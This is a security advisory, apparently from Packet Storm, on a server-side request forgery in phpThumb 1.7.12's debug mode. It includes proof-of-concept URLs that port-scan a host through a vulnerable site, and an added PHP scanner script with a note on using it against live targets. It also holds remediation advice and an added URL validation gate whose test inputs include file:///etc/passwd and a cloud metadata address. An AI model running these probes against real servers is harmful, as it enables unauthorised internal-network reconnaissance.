phpThumb 1.7.12 Server Side Request Forgery

2013-12-02T00:00:00
ID PACKETSTORM:124238
Type packetstorm
Reporter Rafay Baloch
Modified 2013-12-02T00:00:00

Description

#phpThumb 'phpThumbDebug' Server Side Request Forgery  
#Google Dork: inurl:phpThumb.php  
#Author: Rafay Baloch And Deepanker Arora  
#Company: RHA InfoSEC  
#Impact: High  
#Vendor: http://phpthumb.sourceforge.net/#download  
#Version: 1.7.12  
#Status: Reported And Fixed  
  
===========  
Description  
===========  
  
Server side request forgery (SSRF) is not a single bug but a class of  
vulnerability. In an SSRF attack the attacker makes the vulnerable server  
issue requests on their behalf, using it as a pivot point to reach hosts on  
the internal network or the internet that the attacker cannot reach directly.  
Several further attacks can be built on top of this, however we will keep it  
at a basic level (port scanning) for a better understanding.  
  
===========  
Explanation  
===========  
  
The debug mode in phpThumb was introduced for troubleshooting purposes,  
however when it is turned on it turns the remote image fetch into a server  
side request forgery. By exploiting this SSRF an attacker may be able to  
scan local or remote ports, fingerprint services etc. Let's take a look at  
the piece of code responsible for fetching an external image:  
  
    // first call site: fetch $phpThumb->src and use it as the source image
    if ($rawImageData = phpthumb_functions::SafeURLread($phpThumb->src, $error, $phpThumb->config_http_fopen_timeout, $phpThumb->config_http_follow_redirect)) {
        $phpThumb->DebugMessage('SafeURLread('.$phpThumb->src.') succeeded'.($error ? ' with messsages: "'.$error.'"' : ''), __FILE__, __LINE__);
        $phpThumb->DebugMessage('Setting source data from URL "'.$phpThumb->src.'"', __FILE__, __LINE__);
        $phpThumb->setSourceData($rawImageData, urlencode($phpThumb->src));
    } else {
        $phpThumb->ErrorImage($error);
    }
}   // closes the enclosing check on the URL scheme of $phpThumb->src

// second call site: the raw $_GET['src'] is fetched again, only to be hashed
if ($rawImageData = phpthumb_functions::SafeURLread($_GET['src'], $error, $phpThumb->config_http_fopen_timeout, $phpThumb->config_http_follow_redirect)) {
    $md5s = md5($rawImageData);
}
  
Both call sites above fetch whatever the "src" parameter points at, and  
neither checks that the data retrieved is actually a valid image. With debug  
mode set to "True", the error message returned by the lower-layer network  
fetch (for example a refused connection) is written into the debug output,  
and the difference between a successful and a failed fetch is what enables  
an attacker to launch a server side request forgery attack.  
  
Furthermore, I noticed that a check is performed on the URL scheme, which  
rejects local schemes such as file://:  
  
if (preg_match('#^(f|ht)tp\://#i', $phpThumb->src)) {  
  
This still accepts any ftp:// or http:// source, so it does not prevent the  
attack described here, and an attacker may also be able to leverage other  
protocols such as gopher://, dict:// etc. in order to exploit this  
vulnerability further.  
  
Proof of Concept  
================  
  
scanme.nmap.org is known to have ports 22, 80 and 25 open. When debug output  
is enabled, the response for an open port is distinctly different from the  
response for a closed port, so probing through the vulnerable server reveals  
which ports are open:  
  
http://site.com/phpthumb/phpThumb.php?h=32&w=32&src=http://scanme.nmap.org:22&phpThumbDebug=9//  
Open port  
  
http://site.com/phpthumb/phpThumb.php?h=32&w=32&src=http://scanme.nmap.org:80&phpThumbDebug=9//  
Open port  
  
http://site.com/phpthumb/phpThumb.php?h=32&w=32&src=http://scanme.nmap.org:1337&phpThumbDebug=9//  
Closed port  
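The probe and the open/closed decision above, as an added example that is not part of the original advisory or of phpThumb. It builds the probe URLs for a list of ports and classifies each debug response against a baseline taken from a port known to be closed, masking the echoed URL first (the debug dump repeats "SafeURLread(http://host:port)", so unmasked responses differ for every port). The endpoint, the hostnames and the sample responses are constructed for illustration; the fetch itself is left out so the script runs offline.

```php
<?php
// Added example, not phpThumb's code and not from the original advisory.
// Endpoint, hostnames and the sample debug responses below are constructed.

// One probe URL: $endpoint is the vulnerable phpThumb.php, $host:$port the
// service to probe through it. phpThumbDebug=9 requests the full debug dump.
function buildProbeUrl(string $endpoint, string $host, int $port): string
{
    return $endpoint . '?' . http_build_query([
        'h'             => 32,
        'w'             => 32,
        'src'           => sprintf('http://%s:%d', $host, $port),
        'phpThumbDebug' => 9,
    ]);
}

// The debug dump echoes the probed URL back, so raw responses differ for every
// port even when the outcome is the same. Mask URLs and collapse whitespace
// before comparing. Real targets may need more masking (timestamps, ids).
function normaliseDebugOutput(string $body): string
{
    $body = preg_replace('#https?://[^\s"\')]+#i', 'URL', $body);
    $body = preg_replace('/\s+/', ' ', $body);
    return trim($body);
}

// Identical to the closed-port baseline (after masking) means the fetch failed
// the same way, i.e. closed; a timeout text suggests filtered; anything else
// means the server got a different answer from that port, i.e. open.
function classifyPort(string $closedBaseline, string $response): string
{
    $base = normaliseDebugOutput($closedBaseline);
    $resp = normaliseDebugOutput($response);
    if ($resp === $base) {
        return 'closed';
    }
    if (stripos($resp, 'timed out') !== false) {
        return 'filtered';
    }
    return 'open';
}

// Constructed sample responses. The "succeeded" / "Setting source data" lines
// mirror the DebugMessage() calls quoted in the advisory; the failure texts are
// invented stand-ins for whatever the fetch layer reports on a real target.
$samples = [
    1337 => "SafeURLread(http://scanme.nmap.org:1337) failed: Connection refused\n",
    22   => "SafeURLread(http://scanme.nmap.org:22) succeeded\n"
          . "Setting source data from URL \"http://scanme.nmap.org:22\"\n"
          . "source data is not a valid image\n",
    80   => "SafeURLread(http://scanme.nmap.org:80) succeeded\n"
          . "Setting source data from URL \"http://scanme.nmap.org:80\"\n"
          . "source data is not a valid image\n",
    8443 => "SafeURLread(http://scanme.nmap.org:8443) failed: Connection timed out\n",
    4444 => "SafeURLread(http://scanme.nmap.org:4444) failed:   Connection refused\n",
];

$endpoint = 'http://site.com/phpthumb/phpThumb.php';
$baseline = $samples[1337];   // known-closed port, as in the advisory
foreach ($samples as $port => $body) {
    printf("%-80s %s\n",
        buildProbeUrl($endpoint, 'scanme.nmap.org', $port),
        classifyPort($baseline, $body));
}
```

Against a live target, fetch each URL from buildProbeUrl() (curl is enough) and feed the body to classifyPort() with a closed-port baseline captured first; the baseline must be re-taken per target, since the failure text depends on whether the server fetches with fopen or curl.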
  
Remedy  
======  
  
It is recommended to turn off the "debug" mode. Debug mode is disabled by  
replacing the following line in the phpThumb configuration (phpThumb.config.php):  
  
"$PHPTHUMB_CONFIG['disable_debug']= false;"  
  
With:  
  
"$PHPTHUMB_CONFIG['disable_debug']= true;".  
  
  
Fix  
===  
  
1) The authors explicitly disabled all protocols other than http/https/ftp.  
This removes some of the attack vectors.  
  
https://github.com/JamesHeinrich/phpThumb/commit/457a37d4a22ac9cdbbfe19577376622e58df81b0  
  
2) The debug mode has been disabled and "High Security Mode" has been  
enabled by default in phpThumb 1.7.12. Take a look at the author's  
note:  
  
3) Further security improvements are to be done in the future versions.  
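The fix in 1) only restricts the scheme. As an added example (not phpThumb's own code and not from the advisory), the gate below shows what a fetch of the "src" parameter should check beyond that: a strict scheme allowlist, no credentials in the URL, only the scheme's default port, and rejection of any host that resolves to a loopback, private, link-local or otherwise reserved address, which is what an SSRF against the internal network relies on. Function names, the stub resolver and the sample URLs are assumptions made for this example.

```php
<?php
// Added example, not phpThumb's code. Names, resolver table and URLs are
// constructed so the check can be exercised offline.

// True only for addresses outside the private and reserved ranges that
// filter_var() knows about (10/8, 172.16/12, 192.168/16, 127/8, 169.254/16,
// 0/8, 240/4, ::1, fe80::/10, fc00::/7, ...).
function isPublicIp(string $ip): bool
{
    return filter_var(
        $ip,
        FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE
    ) !== false;
}

// Returns [bool $allowed, string $reason]. $resolver maps a host name to its
// addresses; it defaults to DNS and is injectable for offline use.
function validateRemoteSource(string $url, ?callable $resolver = null): array
{
    $resolver = $resolver ?? function (string $host): array {
        $ips = gethostbynamel($host);
        return $ips === false ? [] : $ips;
    };

    $parts = parse_url($url);
    if ($parts === false || empty($parts['scheme']) || empty($parts['host'])) {
        return [false, 'missing scheme or host'];
    }
    $scheme = strtolower($parts['scheme']);
    if (!in_array($scheme, ['http', 'https', 'ftp'], true)) {
        return [false, "scheme {$scheme} not allowed"];
    }
    if (isset($parts['user']) || isset($parts['pass'])) {
        return [false, 'credentials in URL not allowed'];
    }
    // A thumbnailer only needs the default port; this alone stops the port
    // scan in the advisory.
    $defaultPorts = ['http' => 80, 'https' => 443, 'ftp' => 21];
    $port = $parts['port'] ?? $defaultPorts[$scheme];
    if ($port !== $defaultPorts[$scheme]) {
        return [false, "non-default port {$port} not allowed"];
    }
    // IP literals (including bracketed IPv6) are checked directly; names are
    // resolved and every returned address must be public.
    $host = $parts['host'];
    $literal = trim($host, '[]');
    if (filter_var($literal, FILTER_VALIDATE_IP) !== false) {
        $ips = [$literal];
    } else {
        $ips = $resolver($host);
        if ($ips === []) {
            return [false, 'host does not resolve'];
        }
    }
    foreach ($ips as $ip) {
        if (!isPublicIp($ip)) {
            return [false, "host resolves to non-public address {$ip}"];
        }
    }
    return [true, 'ok'];
}

// Constructed resolver table: 203.0.113.0/24 is an RFC 5737 documentation
// range that filter_var() treats as public, which is what we want here.
$stubResolver = function (string $host): array {
    $table = [
        'cdn.example.org'      => ['203.0.113.10'],
        'intranet.example.org' => ['10.0.0.5'],
    ];
    return $table[$host] ?? [];
};

$samples = [
    'http://cdn.example.org/logo.png',
    'http://intranet.example.org/',
    'http://127.0.0.1:22/',
    'http://[::1]/',
    'http://169.254.169.254/latest/meta-data/',
    'http://user:pw@cdn.example.org/',
    'gopher://cdn.example.org:70/',
    'file:///etc/passwd',
];
foreach ($samples as $u) {
    [$ok, $why] = validateRemoteSource($u, $stubResolver);
    printf("%-45s %s (%s)\n", $u, $ok ? 'ALLOW' : 'DENY', $why);
}
```

Two caveats the gate cannot cover by itself: the fetch resolves the name again, so pin the validated address for the connection (curl's CURLOPT_RESOLVE does this) or the check can be defeated by DNS rebinding; and a redirect from an allowed host can point anywhere, so either leave config_http_follow_redirect off or re-run the gate on every hop.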
  
References  
==========  
  
http://www.rafayhackingarticles.net/2013/11/phpthumb-server-side-request-forgery.html  